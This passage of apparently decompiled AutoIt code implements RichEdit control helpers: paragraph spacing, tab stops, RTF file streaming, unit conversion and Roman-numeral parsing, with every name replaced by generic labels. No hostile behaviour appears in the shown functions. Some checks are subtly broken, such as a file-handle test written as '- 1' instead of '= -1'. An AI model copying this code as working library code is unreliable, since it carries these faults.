  4693. LOCAL $Local00B4 =DLLSTRUCTCREATE($Var0530 )
  4694. DLLSTRUCTSETDATA($Local00B4 ,"cbSize" ,DLLSTRUCTGETSIZE($Local00B4 ))
  4695. LOCAL $Local00A1 = 0
  4696. IF $ArgOpt01<>DEFAULT THEN
  4697. $ArgOpt01=STRINGSTRIPWS($ArgOpt01, 8 )
  4698. LOCAL $Local00E0 =STRINGINSTR($ArgOpt01,"line" , 2 )
  4699. IF $Local00E0 <> 0 THEN
  4700. $ArgOpt01=STRINGLEFT($ArgOpt01,$Local00E0 - 1 )
  4701. ENDIF
  4702. IF NOT Fn0176($ArgOpt01,">=0" )THEN RETURN SETERROR(0x03FD , 0 ,FALSE )
  4703. LOCAL $Local00C8 ,$Var0577 = 0
  4704. IF $Local00E0 <> 0 THEN
  4705. SWITCH $ArgOpt01
  4706. CASE 1
  4707. $Local00C8 = 0
  4708. CASE 1.5
  4709. $Local00C8 = 1
  4710. CASE 2
  4711. $Local00C8 = 2
  4712. CASE ELSE
  4713. IF $ArgOpt01< 1 THEN RETURN SETERROR(0x03FE , 0 ,FALSE )
  4714. $Local00C8 = 5
  4715. $Var0577 =$ArgOpt01*0x0014
  4716. ENDSWITCH
  4717. ELSE
  4718. $Local00C8 = 4
  4719. $Var0577 =$ArgOpt01*$Var04B9
  4720. ENDIF
  4721. $Local00A1 =$Var03AE
  4722. DLLSTRUCTSETDATA($Local00B4 ,"bLineSpacingRule",$Local00C8 )
  4723. IF $Var0577 <> 0 THEN DLLSTRUCTSETDATA($Local00B4 ,0x000D ,$Var0577 )
  4724. ENDIF
  4725. IF $ArgOpt02<>DEFAULT THEN
  4726. $Local00A1 =BITOR($Local00A1 ,$Var03A0 )
  4727. DLLSTRUCTSETDATA($Local00B4 ,"dySpaceBefore",$ArgOpt02*$Var04B9 )
  4728. ENDIF
  4729. IF $ArgOpt03<>DEFAULT THEN
  4730. $Local00A1 =BITOR($Local00A1 ,$Var03B0 )
  4731. DLLSTRUCTSETDATA($Local00B4 ,"dySpaceAfter",$ArgOpt03*$Var04B9 )
  4732. ENDIF
  4733. IF $Local00A1 <> 0 THEN
  4734. DLLSTRUCTSETDATA($Local00B4 ,"dwMask" ,$Local00A1 )
  4735. RETURN Fn0006($Arg00,$Var026C , 0 ,$Local00B4 , 0 ,"wparam" ,"struct*" )<> 0
  4736. ELSE
  4737. RETURN TRUE
  4738. ENDIF
  4739. ENDFUNC
  4740.  
  4741. Func Fn0163($Arg00,$Arg01)
  4742. IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 ,FALSE )
  4743. LOCAL $Local00B4 =DLLSTRUCTCREATE($Var0530 )
  4744. DLLSTRUCTSETDATA($Local00B4 ,"cbSize" ,DLLSTRUCTGETSIZE($Local00B4 ))
  4745. IF $Arg01="" THEN
  4746. DLLSTRUCTSETDATA($Local00B4 ,"cTabCount" , 0 )
  4747. ELSE
  4748. LOCAL $Local00E1 =STRINGSPLIT($Arg01,";" )
  4749. IF $Local00E1 [ 0 ]>$Var038E THEN RETURN SETERROR(0x03FD , 0 ,FALSE )
  4750. LOCAL $Var0578 ,$Local00EB ,$Local00DD ,$Local001C ,$Local00E0
  4751. FOR $Local00C1 = 1 TO $Local00E1 [ 0 ]
  4752. $Var0578 =STRINGSPLIT($Local00E1 [$Local00C1 ],"")
  4753. $Local00EB = 1
  4754. WHILE $Local00EB <=$Var0578 [ 0 ]AND STRINGINSTR("01234567890.",$Var0578 [$Local00EB ])<> 0
  4755. $Local00EB += 1
  4756. WEND
  4757. IF $Local00EB = 1 THEN RETURN SETERROR(0x03FD ,$Local00C1 ,FALSE )
  4758. $Local00DD =STRINGLEFT($Local00E1 [$Local00C1 ],$Local00EB - 1 )
  4759. IF NOT Fn0176($Local00DD ,">=0" )THEN RETURN SETERROR(0x03FD ,$Local00C1 ,FALSE )
  4760. $Local001C =$Local00DD *$Var04B9
  4761. IF $Local00EB <=$Var0578 [ 0 ]THEN
  4762. $Local00E0 =STRINGINSTR("lcrdb" ,$Var0578 [$Local00EB ])
  4763. IF $Local00E0 = 0 THEN RETURN SETERROR(0x03FE ,$Local00C1 ,FALSE )
  4764. $Local001C =BITOR($Local001C ,BITSHIFT($Local00E0 - 1 ,-0x0018 ))
  4765. ENDIF
  4766. $Local00EB += 1
  4767. IF $Local00EB <=$Var0578 [ 0 ]THEN
  4768. $Local00E0 =STRINGINSTR(" .-_t=" ,$Var0578 [$Local00EB ])
  4769. IF $Local00E0 = 0 THEN RETURN SETERROR(0x03FF ,$Local00C1 ,FALSE )
  4770. $Local001C =BITOR($Local001C ,BITSHIFT($Local00E0 - 1 ,-0x001C ))
  4771. ENDIF
  4772. DLLSTRUCTSETDATA($Local00B4 ,"rgxTabs" ,$Local001C ,$Local00C1 )
  4773. NEXT
  4774. DLLSTRUCTSETDATA($Local00B4 ,"cTabCount" ,$Local00E1 [ 0 ])
  4775. ENDIF
  4776. DLLSTRUCTSETDATA($Local00B4 ,"dwMask" ,$Var03B6 )
  4777. RETURN Fn0006($Arg00,$Var026C , 0 ,$Local00B4 , 0 ,"wparam" ,"struct*" )<> 0
  4778. ENDFUNC
  4779.  
  4780. Func Fn0164($Arg00,$Arg01)
  4781. IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 ,FALSE )
  4782. IF NOT ISSTRING($Arg01)THEN SETERROR(0x0066 , 0 ,FALSE )
  4783. IF $Arg01="" THEN
  4784. Fn0006($Arg00,$Var0579 )
  4785. ELSE
  4786. Fn0006($Arg00,$Var0579 ,ASC($Arg01))
  4787. ENDIF
  4788. RETURN TRUE
  4789. ENDFUNC
  4790.  
  4791. Func Fn0165($Arg00,$ArgOpt01=TRUE )
  4792. IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 ,FALSE )
  4793. IF NOT ISBOOL($ArgOpt01)THEN RETURN SETERROR(0x0066 , 0 ,FALSE )
  4794. LOCAL $Local0055 =Fn0006($Arg00,$Var057A ,$ArgOpt01)
  4795. IF $Local0055 = 0 THEN RETURN SETERROR(0x02BC , 0 ,FALSE )
  4796. RETURN TRUE
  4797. ENDFUNC
  4798.  
  4799. Func Fn0166($Arg00,$Arg01,$Arg02)
  4800. IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 ,FALSE )
  4801. IF NOT Fn0176($Arg01,">=0" )THEN RETURN SETERROR(0x0066 , 0 ,FALSE )
  4802. IF NOT Fn0176($Arg02,">=0" )THEN RETURN SETERROR(0x0067 , 0 ,FALSE )
  4803. LOCAL $Local0030 =DLLSTRUCTCREATE($Var010E )
  4804. DLLSTRUCTSETDATA($Local0030 , 1 ,$Arg01)
  4805. DLLSTRUCTSETDATA($Local0030 , 2 ,$Arg02)
  4806. RETURN Fn0006($Arg00,$Var0270 , 0 ,$Local0030 , 0 ,"wparam" ,"struct*" )<> 0
  4807. ENDFUNC
  4808.  
  4809. Func Fn0167($Arg00,$Arg01,$Arg02,$ArgOpt03=FALSE )
  4810. IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 ,FALSE )
  4811. IF NOT Fn0176($Arg01,">=0,-1" )THEN RETURN SETERROR(0x0066 , 0 ,FALSE )
  4812. IF NOT Fn0176($Arg02,">=0,-1" )THEN RETURN SETERROR(0x0067 , 0 ,FALSE )
  4813. IF NOT ISBOOL($ArgOpt03)THEN RETURN SETERROR(0x0068 , 0 ,FALSE )
  4814. Fn0006($Arg00,$Var0543 ,$Arg01,$Arg02)
  4815. IF $ArgOpt03 THEN Fn0006($Arg00,$Var0246 ,$ArgOpt03)
  4816. Fn00AF($Arg00)
  4817. RETURN TRUE
  4818. ENDFUNC
  4819.  
  4820. Func Fn0168($Arg00)
  4821. SWITCH STRINGLOWER($Arg00)
  4822. CASE "in"
  4823. $Var04B9 =0x05A0
  4824. CASE "cm"
  4825. $Var04B9 =0x0237
  4826. CASE "mm"
  4827. $Var04B9 = 56.7
  4828. CASE "pt"
  4829. $Var04B9 =0x0014
  4830. CASE "tw"
  4831. $Var04B9 = 1
  4832. CASE ELSE
  4833. RETURN SETERROR( 1 , 0 ,FALSE )
  4834. ENDSWITCH
  4835. RETURN TRUE
  4836. ENDFUNC
  4837.  
  4838. Func Fn0169($Arg00,$Arg01)
  4839. IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 ,FALSE )
  4840. LOCAL $Local0096 =DLLSTRUCTCREATE($Var0534 )
  4841. DLLSTRUCTSETDATA($Local0096 , 1 ,$Var02DE )
  4842. DLLSTRUCTSETDATA($Local0096 , 2 ,$Var0300 )
  4843. LOCAL $Local0055
  4844. IF STRINGLEFT($Arg01, 5 )<>"{\rtf" AND STRINGLEFT($Arg01, 5 )<>"{urtf" THEN
  4845. DLLSTRUCTSETDATA($Local0096 , 2 ,$Var0302 )
  4846. $Local0055 =Fn0006($Arg00,$Var0274 ,$Local0096 ,$Arg01, 0 ,"struct*" ,"wstr" )
  4847. ELSE
  4848. $Local0055 =Fn0006($Arg00,$Var0274 ,$Local0096 ,$Arg01, 0 ,"struct*" ,"STR" )
  4849. ENDIF
  4850. IF NOT $Local0055 THEN RETURN SETERROR(0x02BC , 0 ,FALSE )
  4851. RETURN TRUE
  4852. ENDFUNC
  4853.  
  4854. Func Fn016A($Arg00,$Arg01)
  4855. IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 ,FALSE )
  4856. IF NOT Fn0176($Arg01,">=0" )THEN RETURN SETERROR(0x0066 , 0 ,FALSE )
  4857. RETURN Fn0006($Arg00,$Var027A ,$Arg01)<> 0 OR $Arg01= 0
  4858. ENDFUNC
  4859.  
  4860. Func Fn016B($Arg00,$Arg01)
  4861. IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 ,FALSE )
  4862. LOCAL $Local00E2 =DLLSTRUCTCREATE($Var0519 )
  4863. DLLSTRUCTSETDATA($Local00E2 ,"pfnCallback",DLLCALLBACKGETPTR($Var04BE ))
  4864. LOCAL $Local00E3 =FILEOPEN($Arg01, 0 )
  4865. IF $Local00E3 =- 1 THEN RETURN SETERROR(0x03FD , 0 ,FALSE )
  4866. LOCAL $Local00E4 =FILEREAD($Local00E3 , 5 )
  4867. FILECLOsE($Local00E3 )
  4868. $Local00E3 =FILEOPEN($Arg01, 0 )
  4869. DLLSTRUCTSETDATA($Local00E2 ,"dwCookie" ,$Local00E3 )
  4870. LOCAL $Local009F =Fn0102($Local00E4 =="{\rtf" OR $Local00E4 =="{urtf" ,$Var03FC ,$Var03FA )
  4871. $Local009F =BITOR($Local009F ,$Var0408 )
  4872. IF NOT Fn0147($Arg00)THEN
  4873. Fn0169($Arg00,"")
  4874. ENDIF
  4875. LOCAL $Local00E5 =Fn0006($Arg00,$Var0286 ,$Local009F ,$Local00E2 , 0 ,"wparam" ,"struct*" )
  4876. FILECLOsE($Local00E3 )
  4877. LOCAL $Local0053 =DLLSTRUCTGETDATA($Local00E2 ,"dwError" )
  4878. IF $Local0053 <> 1 THEN SETERROR(0x02BC ,$Local0053 ,FALSE )
  4879. IF $Local00E5 = 0 THEN
  4880. IF FILEGETSIZE($Arg01)= 0 THEN RETURN SETERROR(0x03FE , 0 ,FALSE )
  4881. RETURN SETERROR(0x02BC ,$Local0053 ,FALSE )
  4882. ENDIF
  4883. RETURN TRUE
  4884. ENDFUNC
  4885.  
  4886. Func Fn016C($Arg00,$Arg01)
  4887. IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 ,FALSE )
  4888. LOCAL $Local00E2 =DLLSTRUCTCREATE($Var0519 )
  4889. DLLSTRUCTSETDATA($Local00E2 ,"pfnCallback",DLLCALLBACKGETPTR($Var04C1 ))
  4890. $Var04CA =$Arg01
  4891. LOCAL $Local00DD =STRINGLEFT($Arg01, 5 )
  4892. LOCAL $Local009F =Fn0102($Local00DD =="{\rtf" OR $Local00DD =="{urtf" ,$Var03FC ,$Var03FA )
  4893. $Local009F =BITOR($Local009F ,$Var0408 )
  4894. IF NOT Fn0147($Arg00)THEN
  4895. Fn0169($Arg00,"")
  4896. ENDIF
  4897. Fn0006($Arg00,$Var0286 ,$Local009F ,$Local00E2 , 0 ,"wparam" ,"struct*" )
  4898. LOCAL $Local0053 =DLLSTRUCTGETDATA($Local00E2 ,"dwError" )
  4899. IF $Local0053 <> 1 THEN RETURN SETERROR(0x02BC ,$Local0053 ,FALSE )
  4900. RETURN TRUE
  4901. ENDFUNC
  4902.  
  4903. Func Fn016D($Arg00,$Arg01,$ArgOpt02=TRUE ,$ArgOpt03=0,$ArgOpt04=0)
  4904. IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 ,FALSE )
  4905. LOCAL $Local009F
  4906. IF STRINGRIGHT($Arg01, 4 )=".rtf" THEN
  4907. $Local009F =Fn0102($ArgOpt02,$Var03FC ,$Var03FE )
  4908. ELSE
  4909. $Local009F =Fn0102($ArgOpt02,$Var0400 ,$Var03FA )
  4910. IF BITAND($ArgOpt03,$Var0406 )THEN RETURN SETERROR(0x0411 , 0 ,FALSE )
  4911. ENDIF
  4912. IF BITAND($ArgOpt03,BITNOT(BITOR($Var0406 ,$Var0402 )))THEN RETURN SETERROR(0x0412 , 0 ,FALSE )
  4913. IF BITAND($ArgOpt03,$Var0402 )THEN
  4914. IF NOT BITAND($Local009F ,$Var03FA )THEN RETURN SETERROR(0x0413 , 0 ,FALSE )
  4915. ENDIF
  4916. IF Fn0147($Arg00)THEN $Local009F =BITOR($Local009F ,$Var0408 )
  4917. $Local009F =BITOR($Local009F ,$ArgOpt03)
  4918. IF $ArgOpt04<> 0 THEN
  4919. $Local009F =BITOR($Local009F ,$Var0404 ,BITSHIFT($ArgOpt04,-0x0010 ))
  4920. ENDIF
  4921. LOCAL $Local00E2 =DLLSTRUCTCREATE($Var0519 )
  4922. DLLSTRUCTSETDATA($Local00E2 ,"pfnCallback",DLLCALLBACKGETPTR($Var04C4 ))
  4923. LOCAL $Local00E3 =FILEOPEN($Arg01, 2 )
  4924. IF $Local00E3 - 1 THEN RETURN SETERROR(0x0066 , 0 ,FALSE )
  4925. DLLSTRUCTSETDATA($Local00E2 ,"dwCookie" ,$Local00E3 )
  4926. Fn0006($Arg00,$Var0288 ,$Local009F ,$Local00E2 , 0 ,"wparam" ,"struct*" )
  4927. FILECLOsE($Local00E3 )
  4928. LOCAL $Local0053 =DLLSTRUCTGETDATA($Local00E2 ,"dwError" )
  4929. IF $Local0053 <> 0 THEN SETERROR(0x02BC ,$Local0053 ,FALSE )
  4930. RETURN TRUE
  4931. ENDFUNC
  4932.  
  4933. Func Fn016E($Arg00,$ArgOpt01=TRUE ,$ArgOpt02=TRUE ,$ArgOpt03=0,$ArgOpt04=0)
  4934. IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 ,"")
  4935. LOCAL $Local009F
  4936. IF $ArgOpt01 THEN
  4937. $Local009F =Fn0102($ArgOpt02,$Var03FC ,$Var03FE )
  4938. ELSE
  4939. $Local009F =Fn0102($ArgOpt02,$Var0400 ,$Var03FA )
  4940. IF BITAND($ArgOpt03,$Var0406 )THEN RETURN SETERROR(0x0411 , 0 ,"")
  4941. ENDIF
  4942. IF BITAND($ArgOpt03,BITNOT(BITOR($Var0406 ,$Var0402 )))THEN RETURN SETERROR(0x0412 , 0 ,"")
  4943. IF BITAND($ArgOpt03,$Var0402 )THEN
  4944. IF NOT BITAND($Local009F ,$Var03FA )THEN RETURN SETERROR(0x0413 , 0 ,"")
  4945. ENDIF
  4946. IF Fn0147($Arg00)THEN $Local009F =BITOR($Local009F ,$Var0408 )
  4947. $Local009F =BITOR($Local009F ,$ArgOpt03)
  4948. IF $ArgOpt04<> 0 THEN
  4949. $Local009F =BITOR($Local009F ,$Var0404 ,BITSHIFT($ArgOpt04,-0x0010 ))
  4950. ENDIF
  4951. LOCAL $Local00E2 =DLLSTRUCTCREATE($Var0519 )
  4952. DLLSTRUCTSETDATA($Local00E2 ,"pfnCallback",DLLCALLBACKGETPTR($Var04C7 ))
  4953. $Var04CA =""
  4954. Fn0006($Arg00,$Var0288 ,$Local009F ,$Local00E2 , 0 ,"wparam" ,"struct*" )
  4955. LOCAL $Local0053 =DLLSTRUCTGETDATA($Local00E2 ,"dwError" )
  4956. IF $Local0053 <> 0 THEN SETERROR(0x02BC ,$Local0053 ,"")
  4957. RETURN $Var04CA
  4958. ENDFUNC
  4959.  
  4960. Func Fn016F($Arg00)
  4961. IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 ,FALSE )
  4962. RETURN Fn0006($Arg00,$Var057B , 0 , 0 )<> 0
  4963. ENDFUNC
  4964.  
  4965. Func Fn0170()
  4966. $Var04B7 =DLLCALL("kernel32.dll","ptr" ,"LoadLibraryW","wstr" ,"MSFTEDIT.DLL")
  4967. IF $Var04B7 [ 0 ]<> 0 THEN
  4968. $Var04B6 ="RichEdit50W"
  4969. $Var04B8 = 4.1
  4970. ELSE
  4971. $Var04B7 =DLLCALL("kernel32.dll","ptr" ,"LoadLibraryW","wstr" ,"RICHED20.DLL")
  4972. $Var04B8 =FILEGETVERSION( @SystemDir &"\riched20.dll","ProductVersion")
  4973. SWITCH $Var04B8
  4974. CASE 3.0
  4975. $Var04B6 ="RichEdit20W"
  4976. CASE 5.0
  4977. $Var04B6 ="RichEdit50W"
  4978. CASE 6.0
  4979. $Var04B6 ="RichEdit60W"
  4980. ENDSWITCH
  4981. ENDIF
  4982. $Var04BC =Fn00FB("Rich Text Format")
  4983. $Var04BD =Fn00FB("Rich Text Format with Objects")
  4984. ENDFUNC
  4985.  
  4986. Func Fn0171($Arg00,$Arg01,$Arg02,$Arg03)
  4987. LOCAL $Local00E6 =DLLSTRUCTCREATE("long" ,$Arg03)
  4988. DLLSTRUCTSETDATA($Local00E6 , 1 , 0 )
  4989. LOCAL $Local00E7 =DLLSTRUCTCREATE("char[" &$Arg02&"]" ,$Arg01)
  4990. LOCAL $Local00E4 =FILEREAD($Arg00,$Arg02- 1 )
  4991. IF @ERROR<> 0 THEN RETURN 1
  4992. DLLSTRUCTSETDATA($Local00E7 , 1 ,$Local00E4 )
  4993. DLLSTRUCTSETDATA($Local00E6 , 1 ,STRINGLEN($Local00E4 ))
  4994. RETURN 0
  4995. ENDFUNC
  4996.  
  4997. Func Fn0172($Arg00,$Arg01,$Arg02,$Arg03)
  4998. #forceref $Arg00
  4999. LOCAL $Local00E6 =DLLSTRUCTCREATE("long" ,$Arg03)
  5000. DLLSTRUCTSETDATA($Local00E6 , 1 , 0 )
  5001. LOCAL $Local00E8 =DLLSTRUCTCREATE("char[" &$Arg02&"]" ,$Arg01)
  5002. LOCAL $Local00E9 =STRINGLEFT($Var04CA ,$Arg02- 1 )
  5003. IF $Local00E9 ="" THEN RETURN 1
  5004. DLLSTRUCTSETDATA($Local00E8 , 1 ,$Local00E9 )
  5005. LOCAL $Local009B =STRINGLEN($Local00E9 )
  5006. DLLSTRUCTSETDATA($Local00E6 , 1 ,$Local009B )
  5007. $Var04CA =STRINGMID($Var04CA ,$Local009B + 1 )
  5008. RETURN 0
  5009. ENDFUNC
  5010.  
  5011. Func Fn0173($Arg00,$Arg01,$Arg02,$Arg03)
  5012. LOCAL $Local00E6 =DLLSTRUCTCREATE("long" ,$Arg03)
  5013. DLLSTRUCTSETDATA($Local00E6 , 1 , 0 )
  5014. LOCAL $Local00E7 =DLLSTRUCTCREATE("char[" &$Arg02&"]" ,$Arg01)
  5015. LOCAL $Local00DD =DLLSTRUCTGETDATA($Local00E7 , 1 )
  5016. FILEWRITE($Arg00,$Local00DD )
  5017. DLLSTRUCTSETDATA($Local00E6 , 1 ,STRINGLEN($Local00DD ))
  5018. RETURN 0
  5019. ENDFUNC
  5020.  
  5021. Func Fn0174($Arg00,$Arg01,$Arg02,$Arg03)
  5022. $Arg00=$Arg00
  5023. LOCAL $Local00E6 =DLLSTRUCTCREATE("long" ,$Arg03)
  5024. DLLSTRUCTSETDATA($Local00E6 , 1 , 0 )
  5025. LOCAL $Local00E7 =DLLSTRUCTCREATE("char[" &$Arg02&"]" ,$Arg01)
  5026. LOCAL $Local00DD =DLLSTRUCTGETDATA($Local00E7 , 1 )
  5027. $Var04CA &=$Local00DD
  5028. RETURN 0
  5029. ENDFUNC
  5030.  
  5031. Func Fn0175($Arg00)
  5032. LOCAL $Local0041
  5033. SWITCH $Var04B9
  5034. CASE 0x05A0 ,0x0237
  5035. $Local0041 =STRINGFORMAT("%.2f" ,$Arg00/$Var04B9 )
  5036. IF $Local0041 ="-0.00" THEN $Local0041 ="0.00"
  5037. CASE 56.7 ,0x0048
  5038. $Local0041 =STRINGFORMAT("%.1f" ,$Arg00/$Var04B9 )
  5039. IF $Local0041 ="-0.0" THEN $Local0041 ="0.0"
  5040. CASE ELSE
  5041. $Local0041 =$Arg00
  5042. ENDSWITCH
  5043. RETURN $Local0041
  5044. ENDFUNC
  5045.  
  5046. Func Fn0176($Arg00,$ArgOpt01="")
  5047. IF NOT (ISNUMBER($Arg00)OR STRINGISINT($Arg00)OR STRINGISFLOAT($Arg00))THEN RETURN FALSE
  5048. SWITCH $ArgOpt01
  5049. CASE ">0"
  5050. IF $Arg00<= 0 THEN RETURN FALSE
  5051. CASE ">=0"
  5052. IF $Arg00< 0 THEN RETURN FALSE
  5053. CASE ">0,-1"
  5054. IF NOT ($Arg00> 0 OR $Arg00=- 1 )THEN RETURN FALSE
  5055. CASE ">=0,-1"
  5056. IF NOT ($Arg00>= 0 OR $Arg00=- 1 )THEN RETURN FALSE
  5057. ENDSWITCH
  5058. RETURN TRUE
  5059. ENDFUNC
  5060.  
  5061. Func Fn0177($Arg00,$Arg01,$Arg02)
  5062. IF NOT Fn0147($Arg00)THEN
  5063. RETURN "c"
  5064. ELSEIF BITAND($Arg01,$Arg02)=$Arg02 THEN
  5065. RETURN "a"
  5066. ELSE
  5067. RETURN "f"
  5068. ENDIF
  5069. ENDFUNC
  5070.  
  5071. Func Fn0178($Arg00,$Arg01,BYREF $ArgRef02,BYREF $ArgRef03,BYREF $ArgRef04,BYREF $ArgRef05,BYREF $ArgRef06)
  5072. LOCAL CONST $Var057C ="mdclxviMDCLXVI",$Var057D = 0 ,$Var057E =0x0100 ,$Var057F =0x0200 ,$Var0580 =0x0300
  5073. IF $Arg00="" THEN
  5074. $ArgRef03= 0
  5075. $ArgRef02=$Var039C
  5076. ELSE
  5077. LOCAL $Local00DD =STRINGSTRIPWS($Arg00, 2 )
  5078. $ArgRef06=STRINGLEN($Arg00)-STRINGLEN($Local00DD )
  5079. $Arg00=$Local00DD
  5080. $ArgRef02=$Var03B2
  5081. IF $Arg00="." THEN
  5082. $ArgRef03=$Var03B8
  5083. $ArgRef02=BITOR($ArgRef02,$Var039C )
  5084. ELSEIF $Arg00="=" THEN
  5085. $ArgRef05=0x0400
  5086. $ArgRef02=BITOR($ArgRef02,$Var03A2 )
  5087. ELSE
  5088. SWITCH STRINGRIGHT($Arg00, 1 )
  5089. CASE ")"
  5090. IF STRINGLEFT($Arg00, 1 )="(" THEN
  5091. $ArgRef05=$Var057E
  5092. $Arg00=STRINGTRIMLEFT($Arg00, 1 )
  5093. ELSE
  5094. $ArgRef05=$Var057D
  5095. ENDIF
  5096. CASE "."
  5097. $ArgRef05=$Var057F
  5098. CASE ELSE
  5099. $ArgRef05=$Var0580
  5100. ENDSWITCH
  5101. $ArgRef02=BITOR($ArgRef02,$Var03A2 )
  5102. IF $ArgRef05<>0x0300 THEN $Arg00=STRINGTRIMRIGHT($Arg00, 1 )
  5103. IF STRINGISDIGIT($Arg00)THEN
  5104. $ArgRef04=NUMBER($Arg00)
  5105. $ArgRef03= 2
  5106. $ArgRef02=BITOR($ArgRef02,$Var03A4 ,$Var039C )
  5107. ELSE
  5108. LOCAL $Local00EA =TRUE
  5109. FOR $Local00EB = 1 TO STRINGLEN($Arg00)
  5110. IF NOT STRINGINSTR($Var057C ,STRINGMID($Arg00,$Local00EB , 1 ))THEN
  5111. $Local00EA =FALSE
  5112. EXITLOOP
  5113. ENDIF
  5114. NEXT
  5115. LOCAL $Var0581
  5116. IF $Local00EA THEN
  5117. $Var0581 =$Arg01
  5118. ELSE
  5119. $Var0581 =FALSE
  5120. ENDIF
  5121. SWITCH TRUE
  5122. CASE $Var0581
  5123. $ArgRef04=Fn0179($Arg00)
  5124. IF $ArgRef04=- 1 THEN RETURN SETERROR(0x0066 , 0 ,FALSE )
  5125. $ArgRef03=Fn0102(STRINGISLOWER($Arg00), 5 , 6 )
  5126. $ArgRef02=BITOR($ArgRef02,$Var03A4 ,$Var039C )
  5127. CASE STRINGISALPHA($Arg00)
  5128. IF STRINGISLOWER($Arg00)THEN
  5129. $ArgRef03= 3
  5130. ELSE
  5131. $ArgRef03= 4
  5132. $Arg00=STRINGLOWER($Arg00)
  5133. ENDIF
  5134. $ArgRef04= 0
  5135. LOCAL $Local001C
  5136. FOR $Local00E0 = 1 TO STRINGLEN($Arg00)
  5137. $Local001C =ASC(STRINGMID($Arg00,$Local00EB ))
  5138. IF $Local001C >=ASC("a" )AND $Local001C <=ASC("z" )THEN
  5139. $ArgRef04=$ArgRef04*0x001A +($Local001C -ASC("a" )+ 1 )
  5140. ENDIF
  5141. NEXT
  5142. $ArgRef02=BITOR($ArgRef02,$Var03A4 ,$Var039C )
  5143. CASE ELSE
  5144. RETURN SETERROR(0x0066 , 0 ,FALSE )
  5145. ENDSWITCH
  5146. ENDIF
  5147. ENDIF
  5148. ENDIF
  5149. RETURN TRUE
  5150. ENDFUNC
  5151.  
  5152. Func Fn0179($Arg00)
  5153. LOCAL ENUM $Var0582 ,$Var0583 ,$Var0584 ,$Var0585 ,$Var0586 ,$Var0587
  5154. LOCAL CONST $Local00C2 [ 3 ][ 6 ]=[["cm" ,"d" ,"cd" ,"c" ,0x0064 ,"m" ],["xc" ,"l" ,"xl" ,"x" , 10 ,"mdc" ],["ix" ,"v" ,"iv" ,"i" , 1 ,"mdclx" ]]
  5155. $Arg00=STRINGLOWER($Arg00)
  5156. LOCAL $Local00EB = 1
  5157. WHILE STRINGMID($Arg00,$Local00EB , 1 )="m"
  5158. $Local00EB += 1
  5159. WEND
  5160. LOCAL $Var0588 ,$Var0589 ,$Local0055 =($Local00EB - 1 )*0x03E8
  5161. FOR $Var0558 = 0 TO 2
  5162. $Var0588 = 0
  5163. IF STRINGMID($Arg00,$Local00EB , 2 )=$Local00C2 [$Var0558 ][$Var0582 ]THEN
  5164. $Var0588 = 9
  5165. $Local00EB += 2
  5166. ELSEIF STRINGMID($Arg00,$Local00EB , 1 )=$Local00C2 [$Var0558 ][$Var0583 ]THEN
  5167. $Var0588 = 5
  5168. $Local00EB += 1
  5169. ELSEIF STRINGMID($Arg00,$Local00EB , 2 )=$Local00C2 [$Var0558 ][$Var0584 ]THEN
  5170. $Var0588 = 4
  5171. $Local00EB += 2
  5172. ELSEIF STRINGINSTR($Local00C2 [$Var0558 ][$Var0587 ],STRINGMID($Arg00,$Local00EB , 1 ))THEN
  5173. RETURN - 1
  5174. ENDIF
  5175. IF $Var0588 = 0 OR $Var0588 = 5 THEN
  5176. $Var0589 = 0
  5177. WHILE STRINGMID($Arg00,$Local00EB , 1 )=$Local00C2 [$Var0558 ][$Var0585 ]
  5178. $Var0589 += 1
  5179. IF $Var0589 > 3 THEN RETURN 0
  5180. $Local00EB += 1
  5181. WEND
  5182. $Var0588 +=$Var0589
  5183. ENDIF
  5184. $Local0055 +=$Var0588 *$Local00C2 [$Var0558 ][$Var0586 ]
  5185. NEXT
  5186. IF $Local00EB <=STRINGLEN($Arg00)THEN RETURN - 1
  5187. RETURN $Local0055
  5188. ENDFUNC
  5189.  
  5190. Func Fn017A($Arg00,$Arg01)
  5191. LOCAL $Local00EC =Fn0147($Arg00)
  5192. LOCAL $Var058A
  5193. IF $Local00EC THEN
  5194. $Var058A =Fn013C($Arg00)
  5195. Fn0167($Arg00,$Var058A [ 0 ],$Var058A [ 0 ]+ 1 ,TRUE )
  5196. ENDIF
  5197. LOCAL $Local0055 =Fn0006($Arg00,$Var0218 ,$Var0380 ,$Arg01, 0 ,"wparam" ,"struct*" )
  5198. IF $Local00EC THEN Fn0167($Arg00,$Var058A [ 0 ],$Var058A [ 1 ])
  5199. RETURN $Local0055
  5200. ENDFUNC
  5201.  
  5202. Func Fn017B($Arg00,$Arg01)
  5203. LOCAL $Local00EC =Fn0147($Arg00)
  5204. LOCAL $Local00ED = 0
  5205. IF NOT $Local00EC THEN
  5206. LOCAL $Local00D5 =Fn013B($Arg00)
  5207. $Local00ED =$Local00D5 [ 0 ]
  5208. LOCAL $Local001C =Fn0128($Arg00)
  5209. Fn0167($Arg00,$Local001C ,$Local001C + 1 ,TRUE )
  5210. ENDIF
  5211. Fn0006($Arg00,$Var022A , 0 ,$Arg01, 0 ,"wparam" ,"struct*" )
  5212. IF NOT $Local00EC THEN Fn0167($Arg00,$Local00ED ,$Local00ED )
  5213. RETURN TRUE
  5214. ENDFUNC
  5215.  
  5216. Func Fn017C($Arg00)
  5217. IF NOT ISHWND($Arg00)THEN RETURN SETERROR(0x0065 , 0 ,FALSE )
  5218. IF NOT $Var04CF THEN
  5219. $Var04CE =DLLSTRUCTCREATE("ptr[20]" )
  5220. DLLSTRUCTSETDATA($Var04CE , 1 ,DLLCALLBACKGETPTR($Var04D2 ), 1 )
  5221. DLLSTRUCTSETDATA($Var04CE , 1 ,DLLCALLBACKGETPTR($Var04D5 ), 2 )
